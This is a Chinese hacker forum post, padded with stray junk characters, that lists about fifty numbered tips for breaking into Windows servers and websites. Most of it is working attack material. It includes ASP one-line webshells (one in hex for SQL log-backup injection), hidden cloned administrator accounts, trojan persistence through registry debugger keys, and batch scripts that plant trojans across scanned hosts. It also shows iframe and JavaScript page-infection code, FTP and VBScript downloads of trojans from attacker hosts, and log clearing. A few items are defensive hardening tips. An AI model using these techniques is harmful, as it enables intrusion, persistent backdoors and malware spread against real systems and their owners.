Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
, a% y- y1 Y$ f8 }' T Ncacls C:\windows\system32 /G hqw20:R
; N5 I1 J/ R4 G, I h# J$ }思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入5 F# T- |* ?: \
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
+ q, a: N1 V8 ~' D/ F N" d
7 O* g1 c* A _9 O# ]( P2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
: l! L3 n7 H! G8 @; O0 I" P. w* R2 l5 `5 \. L3 X
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
. ~1 @2 N* w5 B! I! n/ [. M4 W6 ~( _ m2 H: @: m( ~* i
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号9 X! v) m" o7 A
' u. p7 `3 t9 W# J1 u9 Q
5、利用INF文件来修改注册表
2 E% o+ p; S. R" p0 I[Version] N. J- J2 e# x- `3 a" x8 W
Signature="$CHICAGO$"7 P4 }+ |# |* h2 `
[Defaultinstall]
/ s! Z; B/ ?8 M% ]: J: MaddREG=Ating
+ H0 o% e5 l( Z I5 g[Ating] |* ]& h* E% c2 l! I" ?
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1": n) `+ k2 I8 D( {
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:0 x1 ^9 k# _: l. Q- w0 c
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
" J- B2 ^8 M; s O其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU3 W4 r+ L: L! e' f- Y3 I8 `
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU& g) e- N! N, z" B
HKEY_CURRENT_CONFIG 简写为 HKCC
+ J* ^( {2 h- X0 _0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值. J; W. w4 G( B# J9 G
"1"这里代表是写入或删除注册表键值中的具体数据
$ c9 u& [2 ^9 \" Y% l: N$ @
* } @) O8 m }& s8 ]8 y4 ]6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
, v6 l7 U- w# B8 Y多了一步就是在防火墙里添加个端口,然后导出其键值
) e& P2 m% o2 ^4 v9 F! u: t# d[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List] M8 R7 E1 u2 g& ?
# }; w; `3 A" E6 f4 `7 ^7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
2 G+ A6 A' A: _8 y' \在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。2 }: B8 s: r. e6 i6 f
8 a! g2 p/ l8 M* Y( N9 G" Q8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
5 u3 @" `' \6 i/ \9 X
& z$ R, n% d+ V6 S( x6 T9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
% L* a3 F7 P$ F. v" ]# K$ h可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
6 Y+ @0 _, r* r6 I6 u- w
1 Q) t; \5 r, ~9 O: q9 V: \" A10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
1 N3 E5 P% K1 q. Q ^6 D5 c( m4 S7 l5 Z
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,5 Y) G6 p; Q0 J/ y2 _. |
用法:xsniff –pass –hide –log pass.txt7 F1 |5 _- Y" |
3 {8 R ?% F1 C$ p3 ^# K. s
12、google搜索的艺术7 u& m: P6 K5 x! _. D9 y
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
6 L0 c) G4 D# w" k+ v9 d, g! T或“字符串的语法错误”可以找到很多sql注入漏洞。/ q; Y% v6 J0 H5 P
( p5 M! V' N9 T7 ~
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
0 D2 @8 o1 l2 f U: L$ b3 u9 ^; d. n( {; g! W/ d% w, ?
14、cmd中输入 nc –vv –l –p 1987
$ N' W5 H5 ~: P做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃9 j8 \( Z( @5 C7 D8 _8 u# p) x
- S7 k. P/ U& o
15、制作T++木马,先写个ating.hta文件,内容为
0 W& Q9 G% K6 |, T9 t<script language="VBScript">! T2 V9 h0 O0 S; w
set wshshell=createobject ("wscript.shell" ) `' ?; i" F+ h0 l0 U/ F, p- Q
a=wshshell.run("你马的名称",1)
7 y8 j5 `/ O2 d" a2 Nwindow.close0 B9 j* e! K6 K$ T& i
</script>8 b% C. I! p8 n0 u8 z9 c+ n+ \
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。8 b# u) v1 T/ U' t; O7 d3 [
2 T- i; r* v& @" v- {, D+ m
16、搜索栏里输入, B1 m V, p3 {* U% `
关键字%'and 1=1 and '%'='
+ X" G5 ~# C) e1 y6 s* }9 B, e3 _关键字%'and 1=2 and '%'=') v; O3 B' ?% s/ f C& L& ?
比较不同处 可以作为注入的特征字符4 u: U' {* j M- ?4 ?2 a. d
' v/ Y# ]( z% `. ?; y( {( c
17、挂马代码<html>; c, }# H/ M+ s5 u7 P Q
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>) w# T" \0 f* u
</html>
) D$ j7 x3 w j$ c, U4 L! z5 P/ p+ X) e* e. M! i+ {
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
4 v$ H: z& m: z! P' knet localgroup administrators还是可以看出Guest是管理员来。
- M4 F n! f& z9 N& S9 V
4 U3 e1 C b B5 Y: D. e" b19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
, `3 F) y# _: ?. E. T用法: 安装: instsrv.exe 服务名称 路径
: V8 X, h0 q! A {卸载: instsrv.exe 服务名称 REMOVE& C( T: H$ q7 L
& ]+ A6 x+ l% o! f3 ^! V: C; J9 k8 Z2 A/ J7 {+ k: o
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
9 g% h# h! G, Q+ z5 p# t8 n3 l8 w不能注入时要第一时间想到%5c暴库。) n r4 X& Q; S
6 O2 ?% ?/ w2 R) c# g/ n5 G- D22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~0 k2 e$ {: z& S: T$ d
) \# R6 o ], v% J$ d3 b( I
23、缺少xp_cmdshell时" @0 d7 S& w+ N: [. K6 N
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
$ @. } B5 r4 x+ T假如恢复不成功,可以尝试直接加用户(针对开3389的)
+ j1 Q9 |' e( e# ^9 pdeclare @o int
+ R9 Q% P/ c/ u4 u! |2 T' M! j. Kexec sp_oacreate 'wscript.shell',@o out
5 j& |" C3 e9 \9 ?6 U5 F+ eexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员. R1 J' A' z _1 J* s
; [5 l& {0 S& \2 a! i$ q/ ~24.批量种植木马.bat
1 o3 P! f8 e" Efor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
u9 R! W; ?8 V: Efor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间9 |7 h8 M% X7 Y) T8 y2 d
扫描地址.txt里每个主机名一行 用\\开头' c4 ^, e, N% a" V
" P4 R* b# Q, P, w9 a0 K" s25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。+ s& @. {5 b7 _5 _5 \
$ M8 O4 Y2 h8 n5 e) Z# g5 N26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.; f7 G& r- T! e
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下./ h7 @% ^: n* k( @
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马0 T$ K6 V: E) X: l ]
! [8 X1 x' X. k
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
7 N- G% s; J- r6 p W( o4 P然后用#clear logg和#clear line vty *删除日志 e. c {; J, P( ?/ b
/ l& j" g$ h+ S
28、电脑坏了省去重新安装系统的方法
" o g X% N0 o% w4 z% ?纯dos下执行,4 I5 U% h9 a( O5 Z
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
% ]8 i- o ~4 {+ e/ f9 i2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
! c5 a, C8 I3 q! Y2 [$ C' {* P" _9 W" V* X, S
29、解决TCP/IP筛选 在注册表里有三处,分别是:
; k4 E8 [& M# s9 E! vHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
8 @( J" o( d4 j- D7 I$ cHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip) D) t* u7 F3 }9 q( [1 W; E5 s
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip% t9 @0 b" K$ X4 _0 @$ v
分别用
7 L0 u/ R' d- e$ G% tregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! M3 b' d+ S' z, n+ z) \
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
5 Z5 P; r9 X) u+ y jregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip* c: j0 c* X: q$ b7 u) \3 `- x
命令来导出注册表项
; R1 ^0 y- k/ B) y+ A然后把三个文件里的EnableSecurityFilters"=dword:00000001,
d+ B* [ Y) v' j+ I改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
& N( x" N5 a! E; Z- G9 J2 S/ Lregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
, ~ F9 L+ H3 h1 K1 d2 e0 `
& W" u/ t& e! t30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U6 R: D X) K7 b
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
$ X5 ~6 w& r3 i! E! W/ [" i$ I& ^& x% }
31、全手工打造开3389工具5 n i" [, P$ d) S
打开记事本,编辑内容如下:
; s- ?# d6 X2 ^# u' ~7 Zecho [Components] > c:\sql& y% W# b+ c1 ~7 w
echo TSEnable = on >> c:\sql
, Y! h0 N# ?5 E2 N3 osysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q; h" S4 T! d9 W, X3 m. O3 k' r
编辑好后存为BAT文件,上传至肉鸡,执行" u+ R9 [+ m& [; z x
T. t1 S4 P3 \# Y3 b( P" x
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马+ P P) P# S2 ~0 l7 c
@4 d. \9 A% h# u0 r
33、让服务器重启1 i) g+ ]) U8 M( [, z0 N
写个bat死循环:$ H" a: o. T& x% V R
@echo off) a4 O& V8 ?, A7 T
:loop1" }0 U: [* z/ q; ?' I' m# V' N! w
cls) _: l: j' v4 U0 x% q* \' C
start cmd.exe
1 E+ a7 p- ?+ W3 I3 E/ f: Qgoto loop1, a/ r+ Z! ]( D) `# D; N" U
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启4 Y7 N7 s g3 A6 O+ ~4 w: v
* b8 D- Z& v% Y8 E* g( c7 J34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,% P& D! `" l9 _
@echo off0 x z. A5 N& d2 e Q0 c- S3 Q4 O# ^
date /t >c:/3389.txt8 f4 g) C% H1 `" D& ~
time /t >>c:/3389.txt! |6 ~; W2 `! M7 Q/ u p
attrib +s +h c:/3389.bat
, u* O3 j; W# m0 z3 u# E, cattrib +s +h c:/3389.txt1 g6 t8 v, m2 K( O8 l5 x
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt! H9 M/ t `4 [& D8 A/ G
并保存为3389.bat
9 G& w2 e( _' L打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号5 a; L9 u$ z& {6 b% B
: \6 Z% K, K7 W
35、有时候提不了权限的话,试试这个命令,在命令行里输入:- w# u4 D: q, k# K9 Y
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页): M' } B5 V$ w6 h* `( \5 G
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
7 M8 y4 |* j9 n2 S# q
4 E" S$ H5 d" k( c1 M; @8 Q36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
& T5 a7 q* I6 n- t, ]9 n, z. jecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址9 }4 M0 z+ a' ~1 _5 i# l
echo 你的FTP账号 >>c:\1.bat //输入账号: s O! U7 W6 p% U% j# N
echo 你的FTP密码 >>c:\1.bat //输入密码3 y8 ]9 w5 K A5 ^
echo bin >>c:\1.bat //登入/ I9 B6 D* F* o: h1 U+ @
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么* r* ]3 Z+ c! u9 v9 v, Q
echo bye >>c:\1.bat //退出
' M) N4 {% d& `- z然后执行ftp -s:c:\1.bat即可2 r H) p$ k% K2 M8 i% [
( J' s, [, k+ R. |: a37、修改注册表开3389两法! Z! l- v& ^4 \+ b. N8 J1 b
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表/ B* W" J1 [4 t x2 ?4 Z- i. `" _
echo Windows Registry Editor Version 5.00 >>3389.reg
) U, L4 _: w/ j, I/ Becho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg( ^+ r: {5 ]8 n8 S* g' [8 C! o+ q0 r
echo "Enabled"="0" >>3389.reg
3 A3 I2 X2 W# u3 R8 techo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows8 b1 S9 s8 Q: Z* c, C2 k
NT\CurrentVersion\Winlogon] >>3389.reg4 {1 q. {' U1 m4 [6 J6 ~
echo "ShutdownWithoutLogon"="0" >>3389.reg
6 a, S" S5 C1 x% }9 k9 \7 G0 ]; Hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
- T0 ?# K: m' x, b+ w>>3389.reg
5 Y! m4 z' n8 ~$ K2 n- Mecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
. I2 q6 r, d; h8 K; mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]& V% N g( |9 R& R6 D& Q n, R
>>3389.reg
* K X/ g* g: Z) D0 s5 T8 r/ `echo "TSEnabled"=dword:00000001 >>3389.reg. t; ~1 r4 Z& J8 w w0 M# |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg7 {2 t x+ d+ G( Z6 e5 d1 O! n
echo "Start"=dword:00000002 >>3389.reg
7 `* W1 w" Z4 Y3 a4 secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]0 @% u. ?3 o& C$ z, x1 S$ q
>>3389.reg$ m+ Q1 [$ D* z1 H8 K3 p2 E
echo "Start"=dword:00000002 >>3389.reg$ O. ?! g+ s9 P; o9 A2 c
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
" P- G8 @, Q8 w! yecho "Hotkey"="1" >>3389.reg- R7 G1 C* o2 T: C2 p U+ W1 w0 q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 Z1 F; H; z- tServer\Wds\rdpwd\Tds\tcp] >>3389.reg
' Q. P) T7 a/ j7 u, Fecho "PortNumber"=dword:00000D3D >>3389.reg q; g( g' B D5 `% i8 H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 J4 K9 ~* S8 z4 }4 ?! v; w! o7 tServer\WinStations\RDP-Tcp] >>3389.reg
. C7 Z. G5 t; [9 decho "PortNumber"=dword:00000D3D >>3389.reg4 D2 s5 _7 C* m( D
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
' i3 S) B+ \( f% d3 A! a(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)* _( V0 M3 l# J/ N3 R7 E
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
! N/ w5 j; B4 t8 h. h% w" j(2)winxp和win2003终端开启
- f7 N: A# U( ], |4 }0 |用以下ECHO代码写一个REG文件:
4 x: A$ d- S8 K1 }: y5 J% Z0 _7 decho Windows Registry Editor Version 5.00>>3389.reg4 \5 y+ p0 A- y# F% u5 T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ W0 l! _' ?" w+ T9 m* i2 pServer]>>3389.reg1 [" ^0 U) H/ i% N& R7 D5 A: ]
echo "fDenyTSConnections"=dword:00000000>>3389.reg: _. o* O5 n1 R* `+ j# `1 U# ^3 Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. m: j# h0 h# T0 \2 p
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
: u$ T+ p$ ]+ }( D% Hecho "PortNumber"=dword:00000d3d>>3389.reg
# r% I1 G4 r ~7 Z# R! vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 f6 }) [# d( P- G8 p( g& s
Server\WinStations\RDP-Tcp]>>3389.reg1 a) w! b8 g" Q/ U
echo "PortNumber"=dword:00000d3d>>3389.reg
3 V0 b: C' V0 S# i然后regedit /s 3389.reg del 3389.reg
5 X8 o v9 q: y4 |2 [XP下不论开终端还是改终端端口都不需重启! s* T% R1 e$ k; R( m. _: B
" _* N2 }2 y- Z8 {. l) ^38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃 ]3 t9 \7 b; u" M
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'3 I8 ^4 ?% q9 t0 \5 \
K6 O3 Z7 w2 ^2 p K* [
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!& A4 [! w5 f0 o: o6 T- X
(1)数据库文件名应复杂并要有特殊字符' J8 g8 U9 e' N* v/ p
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
+ h0 R! [' A) K a将conn.asp文档中的
: p9 m1 m, ]0 r7 p Z; mDBPath = Server.MapPath("数据库.mdb")
7 g: s% G0 O: C( n6 pconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath; W N" s- X! N5 O5 T" S4 l3 k
, j, s( \# [# m* R/ G
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
: y: ~( {* `! g; l# z9 m, ]* v6 p(3)不放在WEB目录里( Y* \: G* t) G4 Z/ K
* `: w" `: ]; U7 z( e40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
9 N* A9 I0 z' }( A! K# e; {1 W可以写两个bat文件
9 [& d% L! P- D. a+ B@echo off ~( \9 |! G: P5 T
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
: w8 M7 u. \: m: F, @/ k@del c:\winnt\system32\query.exe$ p* m& F2 }4 J0 [' U: `9 k9 T9 s
@del %SYSTEMROOT%\system32\dllcache\query.exe! T" \; d" C" k3 R+ z8 b: g
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
: z! V9 q* \) C" L) d1 {! H2 x% t4 ~2 I1 A2 D5 ^, K
@echo off: q- m! |, P I, b
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe1 C5 Y$ K4 d: z Z
@del c:\winnt\system32\tsadmin.exe8 v& p* n) h. x- c2 [ z! C, M
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex) O: ]9 ~; q# h3 u8 S0 ` w0 D$ V
0 A& S( L0 V* P3 g7 k41、映射对方盘符; R. p/ s7 z8 t* R( ]
telnet到他的机器上,
" \- T0 G+ w. G9 Q: \+ Hnet share 查看有没有默认共享 如果没有,那么就接着运行) j) r+ T" x Y( J- u. @6 v
net share c$=c:$ p+ p) b! U# R
net share现在有c$! p+ @4 \4 F* [" N
在自己的机器上运行4 D% g& k* n8 L: ~8 z# N
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K2 t! b6 _2 c% r0 f
6 p* ]$ S G- c5 z! h- ^
42、一些很有用的老知识
+ H8 l5 ?, ^5 c- ?type c:\boot.ini ( 查看系统版本 )
3 o6 S! @- W- M: s" R5 v( |net start (查看已经启动的服务)
3 p0 G# d# T1 xquery user ( 查看当前终端连接 )
u1 {1 w. n$ unet user ( 查看当前用户 )
$ w+ M1 t% a( R7 Y; [, Anet user 用户 密码/add ( 建立账号 )
* e/ S4 L- ?* q: u' R! P( J; Ynet localgroup administrators 用户 /add (提升某用户为管理员)
! h6 f( _+ `$ V: T6 [ipconfig -all ( 查看IP什么的 )
' e* k y( {& d- c& @5 O' z2 c2 onetstat -an ( 查看当前网络状态 )
5 y" s/ Y, J, m, {findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)' @4 h# M1 }8 Q$ I i- S& N
克隆时Administrator对应1F4
0 ~. s4 T! t" v. {+ E7 o& v; W. F4 yguest对应1F5( l# ?8 H% d9 a
tsinternetuser对应3E8
# y- `1 n0 ^1 a e( u" n; Y- P; ~1 K% E
43、如果对方没开3389,但是装了Remote Administrator Service+ N M; y# {7 X) z! Y- \+ Y
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接. R/ F& r% ~7 X3 H
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
1 o, h% |& K; j$ l r6 g# q( v先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
* a, T0 ]! Z) J3 o4 Z
, P- w4 l+ @ ?6 c2 b5 \; }" n! @44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)0 B5 b3 t* Y3 P( P
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
; P4 O3 B' K8 N: `7 j3 C& u1 v+ D* v& h: e
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
: M2 ], c. C: N$ ^echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open$ B% C8 c# |8 N# ?- M \
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =! q8 Z8 d4 d9 G
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =+ ?7 e2 ^0 M2 X% V, A+ f- g) Y
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs& D$ X6 P$ [& \6 w0 `7 y- ^
(这是完整的一句话,其中没有换行符)
$ L5 p+ l. ~3 o& c然后下载:
1 n. ]- {+ I& x+ X# s/ Icscript down.vbs http://www.hack520.org/hack.exe hack.exe* Y# }( e) r/ ]( G" ^, B w4 ?
5 H2 y. `( P1 i( ~& p1 b. c* d% w" R
46、一句话木马成功依赖于两个条件:
% N% ?( D# d9 N+ w1、服务端没有禁止adodb.Stream或FSO组件 H' y! w, l: i7 ]6 E
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
. @0 P0 H+ t/ k) Q# _: f6 A7 P; W r! ?
47、利用DB_OWNER权限进行手工备份一句话木马的代码:6 U" H3 Z0 g" {$ v5 H" l- h. O
;alter database utsz set RECOVERY FULL--
' T, [! d, b& X0 A% p4 O;create table cmd (a image)--3 @! }, C1 R) P% q& V; B6 K
;backup log utsz to disk = 'D:\cmd' with init--
" z& z1 V; }" |% B( Q9 y: J, ]" j: i" G;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
2 U9 v5 }* f( Y0 X, D! L;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--# Q( d# a3 A5 ]
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
$ W$ Q! |7 s' b- B2 ~; Q7 n, r5 ^; i
6 G4 a3 k+ v- f! y/ x48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
4 t9 K' O) [3 l5 D( @4 I1 H- y; p; y" _$ }2 r2 R
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
7 K7 X7 }# i5 P; _+ ?" h( t" Z5 w6 G所有会话用 'all'。' `$ [ F& u; m0 T4 j$ p
-s sessionid 列出会话的信息。8 Y1 W1 z7 w, A' P D
-k sessionid 终止会话。2 R: M2 _) n. J) N/ R' W0 T0 q: Y$ B
-m sessionid 发送消息到会话。
. E1 `: _3 j7 P: [/ ?
! f* L/ K2 S4 cconfig 配置 telnet 服务器参数。. h$ e) h6 u; Y$ k f
; _+ J9 j1 \4 ]7 a
common_options 为:! w( N% m% V" `* b
-u user 指定要使用其凭据的用户$ r# R! J5 F* O
-p password 用户密码
7 ~3 ]% Q* C& w' A% ]% c0 F- s, }* V7 M5 k7 D0 i9 k+ n
config_options 为:# _5 X0 `! p/ M3 B. a( j) c7 ?
dom = domain 设定用户的默认域- f2 @" s7 \2 j* x4 `
ctrlakeymap = yes|no 设定 ALT 键的映射) c! }( K" j) K) F6 ?
timeout = hh:mm:ss 设定空闲会话超时值
" X, ` [% n* Etimeoutactive = yes|no 启用空闲会话。4 l: u6 |! a( W g* A
maxfail = attempts 设定断开前失败的登录企图数。) |0 b" x6 ^/ F8 j$ r
maxconn = connections 设定最大连接数。9 I" \: b6 p% U5 O8 d' w
port = number 设定 telnet 端口。
: P1 P1 C6 x7 S/ J- b$ A/ msec = [+/-]NTLM [+/-]passwd+ X" g3 I$ j9 d2 i; D: h, A
设定身份验证机构9 ]3 h$ ~- l6 X$ q4 _/ h
fname = file 指定审计文件名。
' B2 e0 i" s9 [" h3 T ?" N1 {fsize = size 指定审计文件的最大尺寸(MB)。' ^% R6 ~. k6 Z7 P6 [6 M! h- ^
mode = console|stream 指定操作模式。, p# W# ` }# V3 W. l
auditlocation = eventlog|file|both
2 C0 j* w6 F* b( ?2 f5 X, q指定记录地点. `! G7 ?$ c/ A! d0 i" ?9 e( G2 b
audit = [+/-]user [+/-]fail [+/-]admin
+ A% v6 J H9 z4 e+ j/ W' q( e, ]. k+ A' A; O+ x9 `
49、例如:在IE上访问: \8 I' l7 Z8 i$ E
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/7 X% B. z2 x% `' P/ C
hack.txt里面的代码是:
: C2 s1 G% _0 \' ?0 b) G<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">1 @& k( \& `0 |1 C5 ?7 E
把这个hack.txt发到你空间就可以了!9 F1 `& `; E# L% @
这个可以利用来做网马哦!, D3 ]8 S$ L: s
1 O! a- G' s" ^
50、autorun的病毒可以通过手动限制!6 u. d; H5 P7 T+ H- A
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!7 t& X# O# r3 L# H+ F# Z9 D
2,打开盘符用右键打开!切忌双击盘符~/ V: \) @7 s% r% j2 Z
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
8 X$ \& E9 r# L$ E2 k s( ]# M% z m. |1 ~
51、log备份时的一句话木马:
b4 N6 u$ B& u1 B# Xa).<%%25Execute(request("go"))%%25>2 q+ q7 x. S% x
b).<%Execute(request("go"))%>
$ j: E0 J' w3 @: i7 y& gc).%><%execute request("go")%><%) A, L) n4 ~& p- d; _, T* F9 B1 }
d).<script language=VBScript runat=server>execute request("sb")</Script>
* `4 G- ]& y' K+ M# S+ [e).<%25Execute(request("l"))%25>
( f1 G1 t2 U! D0 |8 W4 `& W7 Xf).<%if request("cmd")<>"" then execute request("pass")%>
4 c: v" [0 A3 k& F# x5 n Z& ~* G$ @4 } g3 W- G
52、at "12:17" /interactive cmd
/ F5 ` s3 d' C2 _% Q- W2 U1 _- i执行后可以用AT命令查看新加的任务$ E& w; i; B9 f
